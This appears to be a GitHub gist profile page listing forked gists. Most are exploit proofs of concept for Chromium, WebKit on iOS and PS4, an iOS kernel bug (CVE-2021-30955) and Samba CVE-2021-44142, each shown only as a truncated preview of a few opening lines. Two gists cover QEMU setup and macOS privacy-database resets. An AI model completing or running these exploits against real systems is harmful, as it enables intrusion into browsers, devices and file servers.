boy1337 bb33bb
@bb33bb
bb33bb / index.html
Created April 20, 2022 15:22 — forked from hkraw/index.html
GoogleCtf 2021 fullchain
<html>
<head>
<title>google-ctf fullchain</title>
</head>
<body>
<h1>HK</h1>
<pre id='log'></pre>
</body>
<script src='./mojo/mojo_bindings.js'></script>
<script src="./mojo/third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
@bb33bb
bb33bb / poc.c
Created March 18, 2022 13:29 — forked from jakeajames/poc.c
CVE-2021-30955 PoC
#include <stdlib.h>
#include <stdio.h>
#include <pthread/pthread.h>
#include <mach/mach.h>
struct ool_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports[];
};
@bb33bb
bb33bb / UB18-Qemu-AARCH64.md
Created March 18, 2022 07:20 — forked from itzurabhi/UB18-Qemu-AARCH64.md
Run Ubuntu 18.04 on Qemu AARCH64 / ARM64

Install the dependencies

sudo apt install qemu-system-arm qemu-system-mips qemu-efi-aarch64 qemu-kvm qemu-efi cloud-image-utils

Prepare the EFI partition

dd if=/dev/zero of=flash0.img bs=1M count=64
dd if=/usr/share/qemu-efi/QEMU_EFI.fd of=flash0.img conv=notrunc
@bb33bb
bb33bb / exploit.c
Created March 1, 2022 05:46 — forked from jakeajames/exploit.c
leak address of segment_list in oob_timestamp
//
// exploit.c
// extra_time
//
// Created by Jake James on 2/8/20.
// Copyright © 2020 Jake James. All rights reserved.
//
#include "exploit.h"
#include "IOAccelerator_stuff.h"
@bb33bb
bb33bb / CVE-2021-44142.py
Created February 20, 2022 01:33 — forked from 0xsha/CVE-2021-44142.py
CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# CVE-2021-44142 PoC Samba 4.15.0 OOB Read/Write
# (C) 2022 - 0xSha.io - @0xSha
# This PoC is un-weaponized and for educational purposes only.
# To learn how to use the PoC please read the writeup :
# https://0xsha.io/blog/a-samba-horror-story-cve-2021-44142
# requires samba4-python
# References:
# https://www.thezdi.com/blog/2022/2/1/cve-2021-44142-details-on-a-samba-code-execution-bug-demonstrated-at-pwn2own-austin
# Patch : https://attachments.samba.org/attachment.cgi?id=17092
@bb33bb
bb33bb / exploit.html
Created February 14, 2022 13:37 — forked from ujin5/exploit.html
0CTF/TCTF 2020 Quals Chromium
<script id="worker1">
worker:{
if (typeof window === 'object') break worker;
self.onmessage = function() {
console.log("onmessage")
}
}
</script>
<script src="../mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>
@bb33bb
bb33bb / fuck.js
Created February 14, 2022 13:34 — forked from ujin5/fuck.js
WebKit RCE on iOS 14.1
function sleep( sleepDuration ){
var now = new Date().getTime();
while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
for (let i = 0; i < 0x10; i++) {
new ArrayBuffer(0x1000000);
}
}
let data_view = new DataView(new ArrayBuffer(8));
@bb33bb
bb33bb / tcc-reset.py
Created December 2, 2021 06:12 — forked from haircut/tcc-reset.py
Completely reset TCC services database in macOS
#!/usr/bin/python
"""
Completely reset TCC services database in macOS
Note: Both the system and individual users have TCC databases; run the script as both
a user and as root to completely reset TCC decisions at all levels.
2018-08-15: Resetting the 'Location' service fails; unknown cause
2018-08-16: Confirmed the 'All' service does not really reset _all_
services, so individual calls to each service are necessary.
import * as module from "1.mjs";
/*
=> 1.mjs
export let x = {};
export let y = {};
export let z = {};
*/
var f64 = new Float64Array(1);
@bb33bb
bb33bb / ps4.html
Created October 28, 2021 02:20 — forked from sleirsgoevy/ps4.html
PS4 WebKit exploit on 9.00
<script>
var PAGE_SIZE = 16384;
var SIZEOF_CSS_FONT_FACE = 0xb8;
var HASHMAP_BUCKET = 208;
var STRING_OFFSET = 20;
var SPRAY_FONTS = 0x1000;
var GUESS_FONT = 0x200430000;
var NPAGES = 20;
var INVALID_POINTER = 0;
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero)